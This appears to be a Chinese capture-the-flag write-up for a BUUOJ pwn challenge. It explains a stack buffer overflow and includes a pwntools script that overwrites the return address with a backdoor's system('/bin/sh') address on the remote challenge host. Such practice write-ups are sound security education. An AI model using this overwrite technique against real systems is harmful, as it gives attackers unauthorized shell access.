1.使用checksec命令查看文件的保护机制开启情况:
显示除了NX保护均未开启或完全启用 ,说明此题难度系数不高,而NX开启说明数据区域(如栈、堆)不可执行,是防止将 shellcode 写入数据区后跳转执行,所以可优先考虑不利用shellcode注入且简单直接的方式寻找漏洞。
2.利用IDA静态分析:
main函数中提示我们可以通过控制 nbytes 的输入使 read 函数存在溢出风险,所以此题可以优先考虑使 but 溢出的攻击手段。同时,我们也可以得知buf的偏移量是[rbp-10h] = 16 + 8。
从 backdoor 函数中也可以发现 system("/bin/sh") 的调用及其地址0x4006E6,那么我们就可以通过栈溢出实现 backdoor 函数地址的覆盖。
3.编写python脚本:
from pwn import *
r = remote("node5.buuoj.cn", 25343)
# 通过scanf输入nbytes
r.sendline(b'100') # 发送一个偏大的值即可
# 构造payload
offset = 16 + 8
payload = b"a" * offset + p64(0x4006E6) # 实现地址覆盖
r.sendlineafter("[+]What's u name?", payload)
r.interactive()
4.获取flag:
backdoor 函数中调用的是 "/bin/sh" ,仅让我们获取了控制权,所以我们需要搭配 ls(显示子目录)和 cat(读取)命令获取flag

1664

被折叠的 条评论
为什么被折叠?



